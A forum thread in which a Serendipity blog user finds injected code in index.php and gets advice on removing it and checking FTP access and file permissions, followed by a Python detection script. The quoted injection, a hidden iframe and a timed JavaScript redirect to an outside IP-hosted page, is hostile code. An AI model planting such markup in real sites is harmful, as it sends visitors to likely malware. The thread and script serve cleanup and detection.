Blog hacked

Random stuff about serendipity. Discussion, Questions, Paraphernalia.
rolli

Post by rolli »

Hi,

When I had a look at my CoWriters test blog, I noticed that it was hacked. I don't know the reason why.

If you want to have a look at my hacked blog:

http://www.bibi-rolli.de/blog101/

Can anybody help me? The database seems to be clear ...

Best wishes,

Rolli
tadpole
Regular
Posts: 88
Joined: Fri Oct 08, 2004 6:20 am
Location: 33°6'4.079" North, 117°3'6.563" West

Post by tadpole »

Looks like they just inserted a few lines at the beginning of the index.php file. Delete them. An iframe and a script element, it looks like.

As far as why, it probably wasn't serendipity that they got in through.
ionic

Could Be Anything...

Post by ionic »

You are running quite a lot of other applications...

Like a TRIAL version of Invision Power Board...

Of course you can drop a mail to phpaudit@suspekt.org and get an audit of your server for a fee ;)
Rolli

Post by Rolli »

In the morning I had a further look and you are right, this is the code:

<IFRAME style="WIDTH: 1125px; HEIGHT: 1000px" marginWidth=0 marginHeight=0 src="http://217.13.198.251/avs/newdir1/stoorm.html" frameBorder=0 width=150 scrolling=no height=185> </IFRAME>

Code:

<script LANGUAGE="JavaScript">

    setTimeout("window.location='http://217.13.198.251/avs/newdir1/stoorm.html'",15000); 

    // wait delay in ms

</script>



<?php # $Id: index.php,v 1.77 2005/03/02 09:58:33 garvinhicking Exp $
But I think it must be a problem of the blog; my second test blog with another (different) user is also hacked in the same way. The rest of my server is pretty well ....
rolli
Posts: 3
Joined: Fri Apr 01, 2005 10:14 am
Location: Germany

Post by rolli »

UPDATE

After deleting the iframes at the beginning and the end of the index.php, the blog works OK. I have checked my server twice for other intrusion and hacking, but everything is OK ... the hacker just hacked my two test boards and nothing else ....
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany

Post by garvinhicking »

The thing is this: The attacker cannot have inserted the code if he didn't have file access to index.php.

Check the permissions of index.php - if the file is only writable by your FTP user and not nobody (aka webserver) then it means your FTP account got hacked.

There would be no way that serendipity could overwrite the index.php from only within the application.

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
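
The check described in the post above, as an added example (not part of the original thread and not Serendipity code): it reports markup sitting in front of the opening `<?php` tag and whether the web server account could have written the file or its directory. The function names, the sample content and its placeholder URL are constructed for illustration; supplementary groups and ACLs are not considered.

```python
import os
import re
import stat
import tempfile

# Markup that should never appear in front of the opening <?php tag.
MARKUP = re.compile(rb"<\s*(iframe|script)\b", re.IGNORECASE)
# Constructed sample: injected markup ahead of a PHP file (placeholder URL).
SAMPLE = (b'<IFRAME src="http://attacker.invalid/x.html" width=150></IFRAME>\n'
          b'<?php # index.php\n')

def injected_prefix(data: bytes) -> bytes:
    """Return whatever precedes the first <?php tag if it holds iframe/script markup."""
    pos = data.find(b"<?php")
    prefix = data if pos < 0 else data[:pos]
    return prefix if MARKUP.search(prefix) else b""

def web_can_write(st: os.stat_result, web_uid: int, web_gid: int) -> bool:
    """POSIX class check: owner bits if the web user owns it, else group, else other.
    Supplementary groups and ACLs are ignored (assumption of this example)."""
    if st.st_uid == web_uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid == web_gid:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def audit(path: str, web_uid: int, web_gid: int) -> dict:
    """Report injection and whether the web server account could have caused it."""
    with open(path, "rb") as fh:
        data = fh.read()
    parent = os.path.dirname(os.path.abspath(path))
    return {
        "injected": bool(injected_prefix(data)),
        "file_writable_by_web": web_can_write(os.stat(path), web_uid, web_gid),
        # A writable directory lets the file be replaced even if it is read-only.
        "dir_writable_by_web": web_can_write(os.stat(parent), web_uid, web_gid),
    }

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "index.php")
        with open(path, "wb") as fh:
            fh.write(SAMPLE)
        os.chmod(path, 0o644)
        st = os.stat(path)
        # Pretend the web server runs under a different uid/gid than the owner.
        print(audit(path, st.st_uid + 1, st.st_gid + 1))
```

When `injected` is true and both writable flags are false, the web server account could not have made the change, which points at the account that owns the files.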